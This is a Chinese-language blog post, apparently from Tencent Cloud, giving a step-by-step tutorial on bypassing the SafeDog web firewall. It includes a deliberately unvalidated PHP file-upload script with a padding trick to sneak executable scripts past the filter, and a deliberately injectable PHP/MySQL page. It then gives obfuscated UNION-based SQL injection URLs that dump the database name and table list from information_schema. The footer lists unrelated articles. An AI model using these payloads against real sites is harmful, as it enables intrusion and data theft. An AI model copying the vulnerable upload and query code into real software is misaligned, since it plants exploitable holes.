SQL注入 上传绕过安全狗

一,绕过安全狗上传可执行脚本 附上php上传脚本源码,此源码未对上传文件类型做校验 <?php         move_uploaded_file($_FILES["file"]["tmp_name"],"./" . $_FILES["file"]["name"]);         echo "Stored in: " . "./" . $_FILES["file"]["name"]; ?> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file" />  <input type="submit" name="submit" value="Submit" /> </form>   ------------- 绕过方法,工具:burpsuite 1,用 php脚本或者js,python等其他语言,生成48930个字符 <?php  for ($i=0; $i <= 48930; $i++) {          echo 'o'; } ?> 2,抓包,改包   3,添加后如图:   4,查看当前目录,上传成功1 二,sql注入绕过安全狗 1,测试文件,明显的字符型 SQL注入 <?php         header("Content-type: text/html; charset=utf-8");         $link = mysql_connect("localhost","root","root");         mysql_select_db("test",$link);         $sql = "select * from cms where id='{$_GET['id']}'";         echo $sql;         echo '<br>-----------------------------<br>';         $res = mysql_query($sql);         while ( $rows = mysql_fetch_array($res)) {                 echo $rows[0];                 echo $rows[1];                 echo $rows[2];         } ?> 2,正常运行界面   3,添加注入测试语句 http://localhost/waf123.php?id=3' and 1=1 --+   4,修改测试语句 http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+   5,暴库 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+    6,爆表 http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+   

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Hongten

python开发_tempfile

 如果你的应用程序需要一个临时文件来存储数据,但不需要同其他程序共享,那么tempfile模块来创建临时文件(夹)是个不错的选择

15520
来自专栏小白课代表

Adobe CC 2017/2018更改软件安装位置

官方下载链接:https://ccmdls.adobe.com/AdobeProducts/KCCC/1/win32/CreativeCloudSet-Up.e...

18020
来自专栏行者常至

Git 配置 ssh 公钥

3.打开上面已经生成的的密钥文件,并拷贝 vim /d/Users/qubianzhong/.ssh/id_rsa.pub

61110
来自专栏云计算教程系列

如何在Debian 9上设置SSH密钥

SSH或安全shell是用于管理服务器和与服务器通信的加密协议。使用Debian服务器时,您可能会将大部分时间花在通过SSH连接到服务器的终端会话中。

43630
来自专栏情情说

单点登录与权限管理本质:cookie安全问题

继续介绍「单点登录与权限管理」系列的第一部分:单点登录与权限管理本质,前一篇文章介绍了单点登录概念,以CAS协议的基本流程为例讲解了系统间的交互过程,过程中,c...

459130
来自专栏快乐八哥

Angular企业级开发(9)-前后端分离之后添加验证码

1.背景介绍 团队开发的项目,前端基于Bootstrap+AngularJS,后端Spring MVC以RESTful接口给前端调用。开发和部署都是前后端分离。...

443100
来自专栏码生

微信小程序 socket wss 协议

55680
来自专栏游戏杂谈

PHP 图片验证码的问题

发现没有问题,查看php.ini中的扩展,发现extension=php_gd2.dll 已经开启了

21220
来自专栏虚拟化云计算

虚拟机磁盘加密之LUKS

LUKS是一种基于device mapper机制的加密方式。使用加密磁盘前要先mapper映射,映射时需要输入密码,写入和读取磁盘时不需要再输入密码。LUKS可...

16920
来自专栏不想当开发的产品不是好测试

Git SSH Key 生成步骤

Git是分布式的代码管理工具,远程的代码管理是基于SSH的,所以要使用远程的Git则需要SSH的配置。 github的SSH配置如下: 一 、 设置Git的us...

23580

扫码关注云+社区

领取腾讯云代金券